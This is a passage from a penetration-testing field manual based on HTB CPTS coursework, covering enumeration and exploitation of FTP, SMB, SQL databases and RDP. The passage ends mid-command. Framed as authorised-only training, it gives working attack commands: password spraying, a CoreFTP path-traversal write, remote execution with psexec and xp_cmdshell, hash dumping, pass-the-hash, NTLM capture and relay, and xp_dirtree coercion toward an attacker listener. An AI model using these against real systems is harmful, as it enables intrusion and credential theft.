network-service-attack-manual.md (55602B)
1 --- 2 title: "Network Service Attack Manual" 3 description: "Long-form operator guide to service discovery, normal client interaction, misconfiguration review, credential reuse, FTP, SMB, MySQL, MSSQL, RDP, DNS, SMTP, POP3, IMAP, multi-service attack chains, evidence handling, and cleanup." 4 category: pentest-workflow 5 subcategory: "Companion Guides" 6 order: 23 7 tags: ["htb", "cpts", "network-services", "service-enumeration", "ftp", "smb", "mysql", "mssql", "rdp", "dns", "smtp", "pop3", "imap", "password-spraying", "credential-reuse", "pentest-workflow"] 8 tools: ["nmap", "smbclient / smbmap / rpcclient / enum4linux-ng", "NetExec", "Impacket", "Responder", "hashcat", "Medusa / Hydra / Crowbar", "mysql / sqsh / sqlcmd", "FreeRDP", "dig / host / fierce", "smtp-user-enum / swaks / o365spray"] 9 difficulty: intermediate 10 updated: "2026-09-15" 11 source: "vault:HackTheBox/Academy/CPTS Path/11-Attacking-Common-Services" 12 --- 13 14 [Condensed service card](/sheets/pentest-workflow/attacking-common-services-guide) · [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Service-enumeration stage](/sheets/pentest-workflow/service-enumeration) 15 16 # Network Service Attack Manual `fas:ClipboardList` 17 18 > [!dashboard] Field-manual scope 19 > This is the long-form companion to the [condensed service card](/sheets/pentest-workflow/attacking-common-services-guide). It turns the source module into one operator workflow: establish normal access, classify the service, test the cheapest misconfigurations first, validate credentials carefully, and follow every item of loot into the next exposed service. 20 21 FTP, SMB, database engines, RDP, DNS, and mail rarely fail in isolation. An anonymous file share supplies a username. That username confirms a mailbox. A message exposes a database password. The database account can read a configuration file or start a process. The useful unit of work is therefore the chain, not the port. 22 23 > [!danger] Authorised targets only 24 > The commands below include password spraying, NTLM capture and relay, remote command execution, file writes, session access, mail relay, and old memory-corruption exploits. Use them only in an HTB lab or an engagement that explicitly permits the technique. 25 > 26 > On a live engagement, confirm lockout policy before any credential attack, prove impact with the least invasive action available, record every changed setting and dropped file, and restore the target during cleanup. BlueKeep and SMBGhost testing can crash a host. Get separate approval before exploitation. 27 28 ## 1 · Build the service map `fas:Terminal` 29 30 Set target data once. A wrong realm, hostname, or listener address causes enough false negatives that these variables are part of the test, not mere convenience. 31 32 ```bash 33 export IP="10.10.10.10" 34 export TARGET="files01.example.test" 35 export DOMAIN="example.test" 36 export DC="dc01.$DOMAIN" 37 export DCIP="10.10.10.5" 38 export LHOST="10.10.14.2" 39 export U="operator" 40 export P="<secret>" 41 export EVIDENCE="evidence/$IP" 42 mkdir -p "$EVIDENCE" 43 ``` 44 45 > [!warning] Keep secrets out of the evidence directory 46 > Store passwords and hashes in the engagement's approved secret store. Tool output often echoes credentials. Redact it before copying a transcript into the report bundle. 47 48 Run a fast discovery pass, then a version and script pass against the ports that answered. Add an all-TCP sweep when scope and timing permit. Internal test systems often move management services away from their defaults. 49 50 ```bash 51 # Fast port inventory 52 sudo nmap -Pn -n --top-ports 1000 --open -oA "$EVIDENCE/tcp-top" "$IP" 53 54 # All TCP ports; reduce -T4 on fragile or rate-limited networks 55 sudo nmap -Pn -n -p- -T4 --open -oA "$EVIDENCE/tcp-all" "$IP" 56 57 # Focused service scan after extracting open ports 58 sudo nmap -Pn -n -sV -sC \ 59 -p21,25,53,110,139,143,445,465,587,993,995,1433,3306,3389 \ 60 -oA "$EVIDENCE/common-services" "$IP" 61 62 # UDP matters for DNS; scan it explicitly 63 sudo nmap -Pn -n -sU -sV -p53 -oA "$EVIDENCE/udp-services" "$IP" 64 ``` 65 66 ### Port and protocol triage 67 68 | Service | Default port(s) | First unauthenticated checks | Authenticated payoff | 69 |---|---:|---|---| 70 | FTP | TCP 21 | banner, `ftp-anon`, directory listing, write test | file read/write, webroot access, bounce scan | 71 | SMB | TCP 445, 139; UDP 137-138 | dialect, signing, null/guest shares, RPC | share loot, host/user enum, remote admin, hash dump | 72 | MSSQL | TCP 1433; UDP 1434 | version, hostname/domain, instance discovery | data, file read, impersonation, linked servers, OS execution | 73 | MySQL | TCP 3306 | version and handshake | data, `FILE` primitives, UDF path where applicable | 74 | RDP | TCP 3389 | NTLM identity, TLS certificate, NLA/encryption | desktop, redirected drive, admin session operations | 75 | DNS | UDP/TCP 53 | recursion, records, nameserver list, AXFR | authenticated administration is out of scope for this module | 76 | SMTP | TCP 25, 465, 587 | banner, verbs, user disclosure, relay test | sending and mailbox/account discovery | 77 | POP3 | TCP 110, 995 | banner, TLS, username response differences | mailbox download | 78 | IMAP | TCP 143, 993 | banner, capabilities, TLS | mailbox browsing and search | 79 80 > [!tip] Interpret the whole response 81 > A certificate subject can disclose a host or domain. An NTLM challenge can disclose the NetBIOS domain. An SMTP banner may name the mail product. SMB signing status determines whether an NTLM relay path is plausible. Save those details before authentication changes what the service returns. 82 83 ## 2 · Model the attack path 84 85 The source module uses four questions for any vulnerability. This guide renames them as an operator worksheet: 86 87 1. **Entry:** Which field, file, protocol message, library, API, or configuration value can you influence? 88 2. **Handler:** Which parser, function, service component, or business rule consumes it, and what assumption can fail? 89 3. **Security context:** Which operating-system account, database role, group, policy, or container identity runs the handler? 90 4. **Effect:** Does the result reach a local file, local process, database row, another host, or an outbound connection? 91 92 <figure class="flow plate corners"> 93 <figcaption class="flow__cap"><span class="flow__kind">Attack path model</span><span class="flow__dir">LR</span></figcaption> 94 <div class="flow__body"> 95 <svg class="flow-svg" viewBox="0 0 1080 200" role="img" aria-label="Entry to handler to security context to effect, with the effect feeding a second cycle back to entry"> 96 <path class="fedge" d="M255,82 L293,82" marker-end="url(#flow-arrow)" /> 97 <path class="fedge" d="M515,82 L553,82" marker-end="url(#flow-arrow)" /> 98 <path class="fedge" d="M775,82 L813,82" marker-end="url(#flow-arrow)" /> 99 <path class="fedge is-back" d="M925,106 L925,172 L145,172 L145,108" marker-end="url(#flow-arrow)" /> 100 <g class="fnode is-entry"><rect class="fnode__box" x="35" y="58" width="220" height="48" /><text class="fnode__label" x="145" y="79" text-anchor="middle">Entry<tspan class="sub" x="145" dy="15">input, file, config, library</tspan></text></g> 101 <g class="fnode"><rect class="fnode__box" x="295" y="58" width="220" height="48" /><text class="fnode__label" x="405" y="79" text-anchor="middle">Handler<tspan class="sub" x="405" dy="15">parser, function, service logic</tspan></text></g> 102 <g class="fnode"><rect class="fnode__box" x="555" y="58" width="220" height="48" /><text class="fnode__label" x="665" y="79" text-anchor="middle">Security context<tspan class="sub" x="665" dy="15">account, group, role, policy</tspan></text></g> 103 <g class="fnode"><rect class="fnode__box" x="815" y="58" width="220" height="48" /><text class="fnode__label" x="925" y="79" text-anchor="middle">Effect<tspan class="sub" x="925" dy="15">file, process, data, network</tspan></text></g> 104 <g class="felabel"><rect class="felabel__box" x="463" y="164" width="144" height="16" /><text class="felabel__text" x="535" y="175" text-anchor="middle">feeds a second cycle</text></g> 105 </svg> 106 </div> 107 </figure> 108 109 Most exploit chains contain two passes through this model. The first discloses data or creates a foothold. Its output becomes the entry for the second pass, which reaches code execution or a more privileged identity. 110 111 ### Worked model: Log4Shell 112 113 | Cycle | Entry | Handler | Security context | Effect | 114 |---|---|---|---|---| 115 | Initiation | A crafted string reaches a logged value such as an HTTP header | A vulnerable Log4j version interprets the lookup instead of recording plain text | The Java application's account | An outbound lookup to attacker-controlled infrastructure | 116 | Trigger | The returned remote content becomes new input | The application loads or executes it | The same application account | Code execution and an outbound session | 117 118 The model keeps version research tied to impact. A remotely reachable parser bug in a low-privilege sandbox and the same bug in a root-owned daemon do not have the same result. Record the handler and security context before assigning severity. 119 120 ## 3 · Work like a legitimate client first `fas:Terminal` 121 122 Normal interaction exposes permissions, object names, response codes, and protocol behavior that scanners often flatten. Learn the client's verbs before testing abuse. 123 124 ### SMB from Windows command prompt 125 126 ```batch 127 :: One-off UNC browse 128 dir \\%IP%\Finance\ 129 130 :: Map a share with an explicit account 131 net use N: \\%IP%\Finance /user:EXAMPLE\operator * 132 133 :: Inventory, filename search, and content search 134 dir N: /a-d /s /b | find /c ":\" 135 dir N:\*cred* /s /b 136 findstr /s /i /m "password secret token key connection" N:\*.* 137 138 :: Disconnect after collection 139 net use N: /delete 140 ``` 141 142 Passing `*` makes `net use` prompt for the password. This keeps the secret out of the command line. Count files before recursive content searches so a large share does not turn into an uncontrolled collection job. 143 144 ### SMB from PowerShell 145 146 ```powershell 147 $cred = Get-Credential 'EXAMPLE\operator' 148 New-PSDrive -Name N -Root '\\10.10.10.10\Finance' -PSProvider FileSystem -Credential $cred 149 150 (Get-ChildItem N:\ -File -Recurse -ErrorAction SilentlyContinue | Measure-Object).Count 151 Get-ChildItem N:\ -File -Recurse -Include '*cred*','*.config','*.ini','*.kdbx','*.ps1','*.xml' 152 Get-ChildItem N:\ -File -Recurse -ErrorAction SilentlyContinue | 153 Select-String -Pattern 'password|secret|token|connection string' -List 154 155 Remove-PSDrive N 156 ``` 157 158 `Get-ChildItem` emits objects, so size, extension, timestamp, and path filters can be applied before `Select-String`. That matters on production shares where blindly opening every file is slow and noisy. 159 160 ### SMB from Linux 161 162 ```bash 163 # Interactive client; -N attempts a null session 164 smbclient -N -L "//$IP" 165 smbclient "//$IP/Finance" -U 'EXAMPLE/operator' 166 167 # Mount with a protected credentials file 168 sudo mkdir -p /mnt/finance 169 chmod 600 /tmp/finance.creds 170 sudo mount -t cifs "//$IP/Finance" /mnt/finance \ 171 -o credentials=/tmp/finance.creds,ro 172 173 find /mnt/finance -type f \( -iname '*cred*' -o -iname '*.config' -o -iname '*.ini' -o -iname '*.kdbx' \) 174 grep -RIniE 'password|secret|token|connection.?string' /mnt/finance 2>/dev/null 175 176 sudo umount /mnt/finance 177 ``` 178 179 The credentials file uses three lines: `username=operator`, `password=<secret>`, and `domain=EXAMPLE`. Start with a read-only mount. Remount read-write only when scope permits modification and a write primitive matters to the finding. 180 181 ### Database clients 182 183 ```bash 184 # MySQL prompts for the password 185 mysql -h "$IP" -u "$U" -p 186 187 # MSSQL with SQL authentication 188 sqsh -S "$IP" -U "$U" -P "$P" 189 190 # Impacket supports password, NTLM hash, and Kerberos workflows 191 impacket-mssqlclient "$DOMAIN/$U@$TARGET" -windows-auth 192 impacket-mssqlclient "$DOMAIN/$U@$TARGET" -windows-auth -hashes ":<NT_HASH>" 193 impacket-mssqlclient -k -no-pass "$DOMAIN/$U@$TARGET" 194 ``` 195 196 On Windows, use `sqlcmd` for MSSQL and `mysql.exe` for MySQL. DBeaver is useful when the engagement allows a GUI and you need to inspect several database engines, but capture the executed SQL separately so the work remains reproducible. 197 198 ### Mail clients 199 200 Once credentials work, an IMAP-capable client such as Evolution can search headers, bodies, and attachments more reliably than a raw socket session. Record server, port, TLS mode, and authentication method. Avoid synchronising an entire mailbox when a scoped server-side search will answer the question. 201 202 ## 4 · Test configuration before exploits 203 204 The same four configuration failures recur across all of these protocols: 205 206 | Failure | What to test | Evidence to retain | Typical impact | 207 |---|---|---|---| 208 | Factory or weak credentials | vendor defaults, blank passwords, predictable test accounts, approved spray candidates | product/version, exact account class, accepted auth path | unauthorised service access | 209 | Anonymous or guest access | FTP anonymous, SMB null/guest, exposed mail verbs | listing or read-only object that proves access | data disclosure or write access | 210 | Excessive rights | share ACL, database role, service account, impersonation grant | effective permissions and a minimal read/write/execute proof | lateral movement or code execution | 211 | Unneeded defaults | samples, debug endpoints, legacy protocols, open relay, exposed admin interfaces | banner, response, configuration state | enlarged attack surface | 212 213 ### Credential attack order 214 215 1. Attempt anonymous, null, or guest access where the protocol supports it. 216 2. Check a small, product-specific default list against the exact fingerprint. 217 3. Test credentials recovered from the target against the service that exposed them. 218 4. Reuse confirmed credentials across the other in-scope services and hosts. 219 5. Spray one approved password across a known user list, then wait for the interval in the rules of engagement. 220 6. Run a per-account wordlist only in a lab or when the lockout and availability risk is explicitly accepted. 221 222 > [!warning] Lockout control 223 > Discover domain and local account policies before spraying. A single host can validate both domain and local users, and `--local-auth` changes which account database NetExec targets. Count attempts per identity across every protocol; lockout counters may be shared by SMB, RDP, mail, and web authentication. 224 225 ### Evidence loop 226 227 | Phase | Operator question | Minimal proof | 228 |---|---|---| 229 | Discovery | What answered and what identity did it disclose? | scan and banner | 230 | Exposure | What is visible without a credential? | share, record, capability, or directory name | 231 | Authentication | Which account and realm worked? | successful login without recording the secret | 232 | Authorisation | What can that identity read, write, or execute? | a harmless query, listing, or test artefact | 233 | Propagation | Which new host, user, or secret should be tested next? | entry in the target/credential matrix | 234 235 ## 5 · Turn loot into a credential graph `fas:MagnifyingGlass` 236 237 Strings that look trivial can connect two services. Treat filenames, mailbox senders, database owners, document metadata, scheduled-task paths, and share comments as candidate identities. 238 239 ```bash 240 # Search a collected directory without printing binary bodies 241 find loot -type f -printf '%TY-%Tm-%Td %TH:%TM\t%s\t%p\n' | sort 242 rg -n -i --hidden \ 243 -g '!*.jpg' -g '!*.png' -g '!*.gif' -g '!*.pdf' \ 244 'pass(word)?|secret|token|api.?key|connection.?string|user(name)?|server=' loot 245 246 # Useful file classes 247 find loot -type f \( \ 248 -iname '*.config' -o -iname '*.ini' -o -iname '*.xml' -o \ 249 -iname '*.yml' -o -iname '*.yaml' -o -iname '*.ps1' -o \ 250 -iname '*.kdbx' -o -iname '*.pem' -o -iname 'id_rsa*' \ 251 \) -print 252 ``` 253 254 Maintain two small tables during the engagement. 255 256 | Identity | Source | Realm | Valid services | Privilege | Last test | 257 |---|---|---|---|---|---| 258 | `jsmith` | anonymous FTP filename | unknown | pending | unknown | timestamp | 259 260 | Host | Service | Product/version | Anonymous result | Auth result | Follow-up | 261 |---|---|---|---|---|---| 262 | `files01` | SMB/445 | Samba 4.x | read on `public` | pending | inspect documents | 263 264 The source module's representative chain starts with an anonymous FTP filename that resembles a username. The same string fails on FTP as a password, works against mail, leads to database credentials in a message, and ends at MSSQL command execution. The first failed login did not invalidate the candidate. It only invalidated one identity-secret-service combination. 265 266 ## 6 · FTP operations `fas:Terminal` 267 268 FTP separates its control and data channels. Active mode asks the server to connect back to the client; passive mode has the client initiate both connections. Firewalls, NAT, and proxies often make passive mode more reliable. Standard FTP transmits credentials and content in clear text. FTPS adds TLS; SFTP is an SSH subsystem and is a different protocol. 269 270 ### Discover and browse 271 272 ```bash 273 sudo nmap -Pn -n -sV -sC -p21 \ 274 --script ftp-anon,ftp-syst,ftp-bounce \ 275 -oA "$EVIDENCE/ftp" "$IP" 276 277 ftp "$IP" 278 # Name: anonymous 279 # Password: blank or an arbitrary email-shaped string 280 ``` 281 282 Useful interactive commands: 283 284 ```text 285 status show connection and transfer settings 286 passive toggle passive mode 287 binary protect archives, databases, images, and executables 288 ls / dir list the current directory 289 pwd / cd / lcd remote path, remote change, local change 290 get / mget download one or many files 291 put / mput upload one or many files 292 size / mdtm inspect size and modification time where supported 293 ``` 294 295 > [!tip] Switch to binary mode before collection 296 > ASCII mode rewrites line endings and can corrupt archives, databases, KeePass files, and executables. Use `binary` before `get` unless the object is known to be plain text. 297 298 ### Validate read and write permissions 299 300 ```bash 301 # lftp is easier to script and can mirror read-only content 302 lftp -u anonymous, "ftp://$IP" 303 304 # Inside the client, create a harmless marker only when write testing is allowed 305 put ftp-write-proof.txt 306 ls 307 delete ftp-write-proof.txt 308 ``` 309 310 If FTP maps to a webroot, verify the mapping with a harmless text file and an HTTP GET before discussing a server-side script. Record the exact remote path, URL, owner, and cleanup action. 311 312 ### Credential testing 313 314 ```bash 315 medusa -h "$IP" -M ftp -u "$U" -P approved-passwords.txt -f 316 hydra -L users.txt -p 'ApprovedCandidate!' "ftp://$IP" 317 ``` 318 319 `medusa -f` stops after the first success for the host. Rate and concurrency still need to match the rules of engagement. 320 321 ### FTP bounce 322 323 An FTP server that accepts an arbitrary `PORT` destination can scan a network it can reach. Modern daemons usually block this. 324 325 ```bash 326 nmap -Pn -n -v -p80,443 \ 327 -b 'anonymous:guest@ftp-gateway.example.test' \ 328 172.17.0.2 329 ``` 330 331 A positive result proves a network pivot and should be captured even if no open port is found. It shows that the server accepted a third-party data connection. 332 333 ### CoreFTP path traversal, CVE-2022-22836 334 335 Affected CoreFTP builds mishandled traversal in the HTTP PUT path. The write occurs with the service account's filesystem rights. 336 337 ```bash 338 curl -k --path-as-is -X PUT \ 339 --basic -u '<user>:<password>' \ 340 -H "Host: $IP" \ 341 --data-binary 'authorised proof' \ 342 "https://$IP/../../../../../../write-proof.txt" 343 ``` 344 345 Use a harmless destination agreed in advance, confirm its contents, then delete it. `--path-as-is` prevents curl from normalising the traversal before transmission. 346 347 ### FTP decision record 348 349 | Observation | Meaning | Next action | 350 |---|---|---| 351 | Anonymous listing succeeds | unauthenticated disclosure | collect filenames and scoped files | 352 | Directory is writable | integrity impact | test harmless marker and map backing path | 353 | Web server exposes the same path | possible server-side execution | identify accepted script type; get approval before upload | 354 | `PORT` accepts a third-party host | bounce/pivot path | scan only approved internal targets | 355 | Exact vulnerable CoreFTP build | version-gated file write | validate with a removable text file | 356 357 ## 7 · SMB and Windows file services `fas:Terminal` 358 359 SMB carries file, printer, named-pipe, and remote-administration traffic. TCP/445 is direct-hosted SMB; TCP/139 is the older NetBIOS transport. Samba implements SMB on Unix-like systems. Share access and host administration are separate questions: a user can read a share without being a local administrator. 360 361 ### Fingerprint dialect, identity, and signing 362 363 ```bash 364 sudo nmap -Pn -n -sV -sC -p139,445 \ 365 --script smb-protocols,smb2-security-mode,smb2-time,smb2-capabilities \ 366 -oA "$EVIDENCE/smb" "$IP" 367 368 nxc smb "$IP" 369 ``` 370 371 Record the hostname, domain/workgroup, SMB dialect, signing requirement, and time. Clock data helps diagnose Kerberos failures later. SMB signing set to optional or disabled is one prerequisite for relay to SMB; it does not prove that authentication can be coerced or that the relayed identity will have useful rights. 372 373 ### Null, guest, and share enumeration 374 375 ```bash 376 smbclient -N -L "//$IP" 377 smbmap -H "$IP" 378 379 # Explicit guest and known-user checks 380 smbclient -L "//$IP" -U 'guest%' 381 smbclient -L "//$IP" -U "$DOMAIN/$U" 382 383 # Browse and transfer 384 smbclient "//$IP/public" -N 385 smbmap -H "$IP" -r public 386 smbmap -H "$IP" --download 'public\readme.txt' 387 ``` 388 389 Within `smbclient`, use `recurse ON`, `prompt OFF`, and `mget *` only after reviewing the collection scope and share size. Prefer selective retrieval for evidence. 390 391 ### RPC and identity enumeration 392 393 ```bash 394 rpcclient -U '%' "$IP" 395 # enumdomusers 396 # enumdomgroups 397 # querydispinfo 398 # getdompwinfo 399 # netshareenumall 400 401 enum4linux-ng -A -C "$IP" 402 ``` 403 404 `-U '%'` supplies an empty username and password. A successful RPC null session can expose users, groups, password policy, share names, and RIDs even when file shares reject anonymous access. 405 406 ### Permission and write tests 407 408 ```bash 409 smbmap -H "$IP" -u "$U" -p "$P" 410 smbmap -H "$IP" -u "$U" -p "$P" -r Finance 411 412 # Upload a non-executable marker, verify it, and remove it 413 printf 'authorised write proof\n' > /tmp/smb-write-proof.txt 414 smbmap -H "$IP" -u "$U" -p "$P" \ 415 --upload /tmp/smb-write-proof.txt 'Finance\smb-write-proof.txt' 416 smbmap -H "$IP" -u "$U" -p "$P" \ 417 --download 'Finance\smb-write-proof.txt' 418 ``` 419 420 Delete the remote marker through an interactive client after capture. Do not use a web shell as the first write proof. 421 422 ### Password spraying with NetExec 423 424 ```bash 425 # Domain accounts 426 nxc smb targets.txt -d "$DOMAIN" -u users.txt -p 'ApprovedCandidate!' \ 427 --continue-on-success 428 429 # Local accounts; changes the authentication realm per host 430 nxc smb targets.txt -u users.txt -p 'ApprovedCandidate!' \ 431 --local-auth --continue-on-success 432 ``` 433 434 `Pwn3d!` in NetExec output means the account has administrative rights on that host under the tested protocol. A plain success still matters for shares, RPC, and credential reuse. 435 436 ### Remote execution choices 437 438 Use these only after confirming administrative rights and approval for code execution. 439 440 ```bash 441 # Service creation plus ADMIN$ upload; commonly returns SYSTEM 442 impacket-psexec "$DOMAIN/administrator@$IP" 443 444 # Service-based semi-interactive execution without the PsExec service binary 445 impacket-smbexec "$DOMAIN/administrator@$IP" 446 447 # Task Scheduler execution 448 impacket-atexec "$DOMAIN/administrator@$IP" 'whoami && hostname' 449 450 # NetExec command fan-out; -x is cmd.exe, -X is PowerShell 451 nxc smb "$IP" -d "$DOMAIN" -u administrator -p "$P" \ 452 -x 'whoami && hostname' --exec-method smbexec 453 ``` 454 455 Execution methods produce different artefacts. PsExec uploads a binary and creates a service. SMBExec creates a temporary service and redirects output through SMB. AtExec creates a scheduled task. Select the method whose changes you can account for and clean up. 456 457 ### Local account hashes and pass-the-hash 458 459 ```bash 460 # Administrative access required 461 nxc smb "$IP" -u administrator -p "$P" --sam 462 impacket-secretsdump "administrator@$IP" 463 464 # Reuse the NT hash without recovering the plaintext 465 nxc smb "$IP" -u Administrator -H '<NT_HASH>' --local-auth 466 impacket-psexec -hashes ':<NT_HASH>' "Administrator@$IP" 467 ``` 468 469 An NT hash is an authentication secret. Store and report it like a password. The empty LM half in `-hashes ':<NT_HASH>'` is intentional. 470 471 ### Logged-on users 472 473 ```bash 474 nxc smb '10.10.110.0/24' -d "$DOMAIN" -u "$U" -p "$P" --loggedon-users 475 ``` 476 477 This identifies where high-value identities have active sessions. It is host enumeration, not proof that their credentials can be extracted. State the distinction in the report. 478 479 ### NetNTLM capture and relay 480 481 Responder answers local name-resolution broadcasts such as LLMNR and NBT-NS. A client that requests a nonexistent name may authenticate to the attack host, which yields NetNTLM challenge-response material. 482 483 ```bash 484 sudo responder -I tun0 485 hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt 486 ``` 487 488 For relay, disable Responder's SMB and HTTP listeners so `ntlmrelayx` can bind them, build a target list whose SMB signing is not required, and wait for or trigger an in-scope authentication event. 489 490 ```bash 491 nxc smb targets.txt --gen-relay-list relayable.txt 492 sudo impacket-ntlmrelayx --no-http-server -smb2support -tf relayable.txt 493 ``` 494 495 Relay requires all of the following: 496 497 1. The victim must authenticate to the relay listener. 498 2. The destination must accept the chosen NTLM relay path. For SMB, message signing cannot be required. 499 3. The relayed identity must have permission to perform the demonstrated action. 500 4. The destination must differ where protocol protections prevent reflection to the same service. 501 502 Capture, crack, and relay are different findings. A captured NetNTLMv2 response is not an NT hash and cannot be used directly for standard pass-the-hash. 503 504 ### SMBGhost, CVE-2020-0796 505 506 SMBGhost affected SMBv3.1.1 compression handling in specific Windows 10 and Windows Server builds. The kernel-level bug can crash the target. Confirm the OS build and patch state with a scanner before considering exploitation. A version banner alone is insufficient evidence of exploitability. 507 508 ### SMB decision record 509 510 | Observation | Finding | Required follow-up | 511 |---|---|---| 512 | Null/guest share access | unauthenticated exposure | document readable and writable paths | 513 | Signing not required | relay prerequisite | find an auth source and test target-side rights | 514 | Valid non-admin credential | authenticated SMB access | enumerate shares, RPC, and reuse boundaries | 515 | Admin-equivalent credential | remote administration | choose a minimal execution or secrets proof | 516 | SAM dump | local credential compromise | test scope-limited reuse; avoid assuming domain impact | 517 518 ## 8 · SQL Server and MySQL `fas:Terminal` 519 520 Databases concentrate business data, application secrets, and trusted links. Separate database privilege from operating-system privilege. A SQL `sysadmin` can usually reach OS execution on MSSQL, but the process runs as the SQL Server service account. A MySQL user with `FILE` can read or write only where both MySQL policy and filesystem permissions allow it. 521 522 ### Discovery and connection 523 524 ```bash 525 sudo nmap -Pn -n -sV -sC -p1433,3306 \ 526 --script ms-sql-info,ms-sql-ntlm-info,mysql-info \ 527 -oA "$EVIDENCE/sql" "$IP" 528 529 mysql -h "$IP" -u "$U" -p 530 sqsh -S "$IP" -U '.\local_sql_user' -P "$P" -h 531 impacket-mssqlclient "$DOMAIN/$U@$TARGET" -windows-auth 532 ``` 533 534 MSSQL commonly uses TCP/1433 and the SQL Browser on UDP/1434, but named instances can listen elsewhere. MySQL uses TCP/3306 by default. MSSQL may use Windows-only authentication or mixed mode, which also accepts SQL-native accounts. 535 536 ### Engine inventory 537 538 ```sql 539 -- MySQL 540 SELECT VERSION(), USER(), CURRENT_USER(); 541 SHOW DATABASES; 542 SELECT user, host FROM mysql.user; 543 USE application_db; 544 SHOW TABLES; 545 SHOW COLUMNS FROM users; 546 SELECT * FROM users LIMIT 20; 547 ``` 548 549 ```sql 550 -- MSSQL; GO terminates a batch in sqlcmd/sqsh 551 SELECT @@SERVERNAME, @@VERSION, SYSTEM_USER, USER_NAME(); 552 GO 553 SELECT name FROM master.dbo.sysdatabases; 554 GO 555 SELECT name, type_desc FROM sys.server_principals; 556 GO 557 SELECT table_schema, table_name FROM application_db.INFORMATION_SCHEMA.TABLES; 558 GO 559 ``` 560 561 Inventory schemas and column names before selecting rows. Limit output, avoid bulk PII collection, and record why each table was queried. 562 563 ### MSSQL role and permission checks 564 565 ```sql 566 SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin; 567 GO 568 SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 569 GO 570 SELECT permission_name, state_desc 571 FROM sys.server_permissions 572 WHERE grantee_principal_id = SUSER_ID(); 573 GO 574 ``` 575 576 ### MSSQL impersonation 577 578 ```sql 579 SELECT DISTINCT grantor.name AS impersonatable_login 580 FROM sys.server_permissions AS perm 581 JOIN sys.server_principals AS grantor 582 ON perm.major_id = grantor.principal_id 583 WHERE perm.permission_name = 'IMPERSONATE' 584 AND perm.grantee_principal_id = SUSER_ID(); 585 GO 586 587 USE master; 588 GO 589 EXECUTE AS LOGIN = 'sa'; 590 GO 591 SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin'); 592 GO 593 REVERT; 594 GO 595 ``` 596 597 Check `SYSTEM_USER` and `IS_SRVROLEMEMBER` after every context switch. `REVERT` returns to the original login. Do not assume that permission to impersonate one principal leads to `sysadmin`; prove the role chain. 598 599 ### MSSQL operating-system execution 600 601 ```sql 602 EXEC master..xp_cmdshell 'whoami'; 603 GO 604 ``` 605 606 If `xp_cmdshell` is disabled and the account is `sysadmin`, record the original state before changing it: 607 608 ```sql 609 EXEC sp_configure 'show advanced options'; 610 GO 611 EXEC sp_configure 'xp_cmdshell'; 612 GO 613 614 EXEC sp_configure 'show advanced options', 1; 615 RECONFIGURE; 616 EXEC sp_configure 'xp_cmdshell', 1; 617 RECONFIGURE; 618 GO 619 620 EXEC master..xp_cmdshell 'whoami && hostname'; 621 GO 622 623 -- Restore the original values after validation 624 EXEC sp_configure 'xp_cmdshell', 0; 625 RECONFIGURE; 626 EXEC sp_configure 'show advanced options', 0; 627 RECONFIGURE; 628 GO 629 ``` 630 631 `xp_cmdshell` runs synchronously under the SQL Server service account or its configured proxy. Long commands can hold the database connection open. Use short identity and hostname checks as proof. 632 633 ### File reads and writes 634 635 ```sql 636 -- MySQL policy gate 637 SHOW VARIABLES LIKE 'secure_file_priv'; 638 SHOW GRANTS FOR CURRENT_USER(); 639 640 -- Read requires FILE and filesystem access 641 SELECT LOAD_FILE('/etc/hosts'); 642 643 -- Write refuses to overwrite an existing file 644 SELECT 'authorised proof' 645 INTO OUTFILE '/var/lib/mysql-files/write-proof.txt'; 646 ``` 647 648 `secure_file_priv` set to a directory restricts file operations to that directory. An empty value permits unrestricted paths subject to filesystem rights. `NULL` disables these operations. 649 650 ```sql 651 -- MSSQL read under the service account 652 SELECT BulkColumn 653 FROM OPENROWSET( 654 BULK N'C:\Windows\System32\drivers\etc\hosts', 655 SINGLE_CLOB 656 ) AS contents; 657 GO 658 ``` 659 660 MSSQL file writes through OLE Automation require administrative configuration changes. Prefer `xp_cmdshell` with a removable text marker when command execution is already approved. If OLE Automation itself is the finding, capture its original state and restore it. 661 662 ### Linked-server movement 663 664 ```sql 665 EXEC master.dbo.sp_linkedservers; 666 GO 667 SELECT name, product, provider, data_source, is_linked 668 FROM sys.servers; 669 GO 670 671 EXEC ('SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') 672 AT [SQL02\SQLEXPRESS]; 673 GO 674 ``` 675 676 A link uses the mapping configured on the first server. Its effective identity can be weaker or stronger than the current login. Enumerate each hop and avoid claiming control of the linked host until the remote query proves the context. 677 678 ### Coerce the SQL service account to authenticate 679 680 ```bash 681 sudo impacket-smbserver share "$PWD" -smb2support 682 ``` 683 684 ```sql 685 EXEC master..xp_dirtree '\\10.10.14.2\share\'; 686 GO 687 EXEC master..xp_subdirs '\\10.10.14.2\share\'; 688 GO 689 ``` 690 691 These stored procedures try to list a UNC path. Windows may authenticate to the listener as the SQL Server service account. An access-denied message from the procedure does not prove that authentication failed; inspect the listener output. Apply the same capture-versus-relay distinctions used in the SMB section. 692 693 ### SQL decision record 694 695 | Capability | MSSQL test | MySQL test | Impact boundary | 696 |---|---|---|---| 697 | List business data | `INFORMATION_SCHEMA.TABLES` | `SHOW TABLES` | database permissions | 698 | Check admin role | `IS_SRVROLEMEMBER` | `SHOW GRANTS` | database server | 699 | Change identity | `EXECUTE AS LOGIN` | role/account grants | effective DB principal | 700 | Execute OS command | `xp_cmdshell` | UDF/plugin route if enabled | service account | 701 | Read a file | `OPENROWSET(BULK...)` | `LOAD_FILE()` | service account + DB policy | 702 | Write a file | command/OLE route | `INTO OUTFILE` | path policy + filesystem ACL | 703 | Reach another server | linked servers | federated/app configuration | mapped remote identity | 704 705 ## 9 · Remote Desktop operations `fas:Terminal` 706 707 RDP provides an interactive Windows desktop over TCP/3389. Network Level Authentication moves credential validation before full session creation. TLS and NLA improve transport and pre-authentication behavior; weak passwords and excessive group membership remain exploitable. 708 709 ### Enumerate the endpoint 710 711 ```bash 712 sudo nmap -Pn -n -p3389 \ 713 --script rdp-enum-encryption,rdp-ntlm-info \ 714 -oA "$EVIDENCE/rdp" "$IP" 715 ``` 716 717 Save the certificate name, NTLM target identity, supported security layers, and NLA state. An open port does not prove that a specific account may log on through Remote Desktop Services. 718 719 ### Controlled password spray 720 721 ```bash 722 crowbar -b rdp -s "$IP/32" -U 